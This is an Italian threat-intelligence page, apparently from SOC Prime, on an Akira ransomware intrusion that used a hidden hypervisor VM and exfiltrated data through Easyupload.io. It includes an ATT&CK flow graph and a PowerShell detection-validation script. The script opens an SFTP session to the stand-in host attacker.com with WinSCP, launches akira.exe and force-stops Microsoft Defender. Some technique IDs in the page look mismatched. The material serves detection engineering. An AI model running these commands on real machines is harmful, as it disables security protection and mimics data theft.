SOC Prime Bias: Alto

19 Jun 2026 07:31 UTC
newspaper icon Huntress

Akira, LimeWire e l’Amaro Sapore dell’Esfiltrazione di Dati

Author Photo
SOC Prime Team linkedin icon Segui
Akira, LimeWire e l’Amaro Sapore dell’Esfiltrazione di Dati
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query


Sintesi

Un affiliato del ransomware Akira ha ottenuto accesso non autorizzato a un hypervisor e ha creato una nuova macchina virtuale da utilizzare come ambiente di staging nascosto. L’attaccante si è affidato a questa VM isolata per evitare il monitoraggio della sicurezza, preparare i dati con WinRAR e esfiltrare gli archivi tramite la piattaforma di condivisione file Easyupload.io. Il caso dimostra come gli attori delle minacce continuino ad abusare dei servizi di upload legittimi per il furto di dati.

Indagine

L’indagine ha combinato la telemetria EDR, i registri degli eventi di Windows e la cronologia di navigazione di Microsoft Edge per ricostruire l’intrusione. Gli analisti hanno anche recuperato un’immagine VHDX della macchina virtuale canaglia, che ha rivelato l’attaccante disabilitare Microsoft Defender e configurare l’operazione del ransomware Akira. L’analisi forense della VM ha esposto gli strumenti esatti, i siti web e il flusso di lavoro utilizzati durante le fasi di staging ed esfiltrazione.

Mitigazione

Le organizzazioni dovrebbero monitorare l’apparizione di nuovi endpoint o istanze di macchine virtuali non autorizzate nel loro ambiente. È essenziale avere una forte visibilità nell’accesso remoto ai sistemi critici come hypervisor e controller di dominio. Inoltre, è importante restrictere o monitorare attentamente l’accesso a servizi di condivisione file e di upload rapido noti che possono essere utilizzati per l’esfiltrazione.

Risposta

Se viene identificato un accesso non autorizzato all’hypervisor, isolare immediatamente l’hypervisor colpito e le eventuali nuove macchine virtuali create. Eseguire un’analisi forense delle immagini del disco VM per determinare l’entità dello staging e dell’esfiltrazione dei dati. Esaminare i log di accesso per tracciare il punto di ingresso originale e confermare che non rimanga alcun accesso persistente dell’attaccante.

graph TB %% Definizione delle classi classDef action fill:#99ccff classDef tool fill:#cccccc classDef malware fill:#ff6666 classDef defense fill:#ffcc00 %% Fase di accesso iniziale action_access[“<b>Azione</b> – <b>T1563.002 e T1021</b><br/>Accesso non autorizzato tramite Servizi Remoti<br/>e Hijacking delle sessioni mirato a<br/>Domain Controller e Hypervisor.”] class action_access action %% Fase di ricognizione action_recon_ad[“<b>Azione</b> – <b>T1087 e T1681</b><br/>Ricognizione tramite enumerazione di<br/>utenti e computer Active Directory.”] class action_recon_ad action action_recon_soft[“<b>Azione</b> – <b>T1592.002</b><br/>Raccolta di informazioni relative<br/>al software dell’host.”] class action_recon_soft action %% Elusione delle difese e preparazione action_hide_artifact[“<b>Azione</b> – <b>T1564.006</b><br/>Nascondimento degli artefatti tramite l’esecuzione<br/>di una nuova istanza virtuale sull’hypervisor<br/>per aggirare gli agenti di sicurezza.”] class action_hide_artifact action action_disable_defender[“<b>Azione</b> – <b>T1685</b><br/>Indebolimento delle difese tramite la disattivazione<br/>di Microsoft Defender sulla nuova VM.”] class action_disable_defender defense %% Movimento laterale e raccolta dati action_lateral_move[“<b>Azione</b> – <b>T1080</b><br/>Movimento laterale verso<br/>il file server dell’organizzazione.”] class action_lateral_move action tool_winrar[“<b>Strumento</b> – <b>Nome</b>: WinRAR<br/><b>Descrizione</b>: Utilizzato per archiviare<br/>file sensibili all’interno di cartelle condivise.”] class tool_winrar tool action_collect_data[“<b>Azione</b> – <b>T1560</b><br/>Raccolta dei dati tramite archiviazione<br/>di file sensibili.”] class action_collect_data action %% Fase di esfiltrazione action_stage_data[“<b>Azione</b> – <b>T1074.002</b><br/>Staging dei dati tramite archiviazione temporanea<br/>dei file compressi prima dell’esfiltrazione.”] class action_stage_data action action_move_tools[“<b>Azione</b> – <b>T1570</b><br/>Trasferimento di strumenti in ingresso per spostare<br/>strumenti di attacco nell’ambiente.”] class action_move_tools action tool_winscp[“<b>Strumento</b> – <b>Nome</b>: WinSCP<br/><b>Descrizione</b>: Utilizzato<br/>per il trasferimento dei dati.”] class tool_winscp tool tool_easyupload[“<b>Strumento</b> – <b>Nome</b>: Easyupload.io / LimeWire<br/><b>Descrizione</b>: Servizio web di trasferimento file<br/>utilizzato per l’esfiltrazione.”] class tool_easyupload tool action_exfiltrate[“<b>Azione</b> – <b>T1071.002 e T1105</b><br/>Esfiltrazione tramite servizi web<br/>e protocolli di trasferimento file.”] class action_exfiltrate action %% Fase di impatto malware_akira[“<b>Malware</b> – <b>Nome</b>: Akira ransomware<br/><b>File</b>: akira.exe<br/><b>Descrizione</b>: Cifra i file sulle<br/>condivisioni di rete montate.”] class malware_akira malware action_impact[“<b>Azione</b> – <b>T1486</b><br/>Impatto tramite crittografia dei dati.”] class action_impact action %% Flusso delle connessioni action_access –>|porta_a| action_recon_ad action_access –>|porta_a| action_recon_soft action_recon_ad –>|porta_a| action_hide_artifact action_recon_soft –>|porta_a| action_hide_artifact action_hide_artifact –>|porta_a| action_disable_defender action_disable_defender –>|porta_a| action_lateral_move action_lateral_move –>|porta_a| action_collect_data action_collect_data –>|utilizza| tool_winrar action_collect_data –>|porta_a| action_stage_data action_stage_data –>|porta_a| action_move_tools action_move_tools –>|porta_a| action_exfiltrate action_exfiltrate –>|utilizza| tool_winscp action_exfiltrate –>|utilizza| tool_easyupload action_exfiltrate –>|porta_a| malware_akira malware_akira –>|risulta_in| action_impact

Flusso di attacco

Esecuzione di simulazione

Prerequisito: il controllo pre-volo di Telemetria & Baseline deve essere superato.

Motivazione: Questa sezione dettaglia l’esecuzione precisa della tecniche dell’avversario (TTP) progettate per attivare la regola di rilevamento. I comandi e il racconto DEVONO riflettere direttamente i TTP identificati e mirare a generare la telemetria esatta richiesta dalla logica di rilevamento. Esempi astratti o non correlati porteranno a diagnosi errate.

  • Narrativa e Comandi dell’Attacco: L’avversario ha ottenuto l’accesso iniziale e cerca di aumentare l’impatto. Innanzitutto, enumerano i file sensibili controllando file di testo noti come AdUsers.txt. Per prepararsi all’esfiltrazione, usano WinRAR.exe per comprimere i dati. Preparano quindi il loro strumento di esfiltrazione, WinSCP.exe, e infine eseguono il payload del ransomware akira.exe . Per impedire all’EDR/Antivirus di terminare il processo, tentano di fermare il servizio Windefend . Questa specifica sequenza di argomenti della riga di comando e cambiamenti dello stato del servizio è intesa a attivare la logica di rilevamento specifica di Akira.

  • Script di Test di Regressione:

    # Script di Simulazione per la Validazione del Ransomware Akira
# NOTA: Questo script richiede privilegi amministrativi per interrompere il servizio Defender.

Write-Host "[+] Inizio simulazione ransomware Akira..." -ForegroundColor Cyan

# 1. Simulare Scoperta/Enumerazione (T1119)
Write-Host "[+] Fase 1: Simulazione dell'enumerazione dei file tramite Blocco note..."
Start-Process notepad.exe -ArgumentList "AdUsers.txt"
Start-Sleep -Seconds 2

# 2. Simulare Archiviazione Dati (T1560.003)
# Nota: Assumiamo che WinRAR sia presente o simuliamo l'attività della riga di comando
Write-Host "[+] Fase 2: Simulazione archiviazione dati con WinRAR..."
Start-Process "WinRAR.exe" -ArgumentList "a -r sensitive_data.rar AdUsers.txt AdComp.txt"
Start-Sleep -Seconds 2

# 3. Simulare Preparazione Strumento di Esfiltrazione (T1105)
Write-Host "[+] Fase 3: Simulazione esecuzione strumento di esfiltrazione..."
Start-Process "WinSCP.exe" -ArgumentList "/command open sftp://attacker.com"
Start-Sleep -Seconds 2

# 4. Simulare Esecuzione di Ransomware (T1204.002)
Write-Host "[+] Fase 4: Simulazione esecuzione payload Akira..."
Start-Process "akira.exe"
Start-Sleep -Seconds 2

# 5. Simulare Disabilitazione Defender (T1564.006)
# Questo attiva EventID 7036 nel registro di sistema
Write-Host "[+] Fase 5: Tentativo di fermare Microsoft Defender..."
Stop-Service -Name "Windefend" -Force

Write-Host "[+] Simulazione completa. Controlla il SIEM per gli avvisi." -ForegroundColor Green

  • Comandi di Pulizia:

    # Script di Pulizia
Write-Host "[+] Pulizia di artefatti di simulazione..." -ForegroundColor Cyan

# Riavviare il servizio Defender
Start-Service -Name "Windefend"

# Rimuovere file simulati
Remove-Item -Path "AdUsers.txt", "AdComp.txt", "sensitive_data.rar" -ErrorAction SilentlyContinue

Write-Host "[+] Pulizia completata." -ForegroundColor Green

Unisciti alla piattaforma Detection as Code di SOC Prime per migliorare la visibilità sulle minacce più rilevanti per il tuo business. Per aiutarti a iniziare e aumentare immediatamente il valore, prenota ora un incontro con gli esperti di SOC Prime.

Iscriviti gratis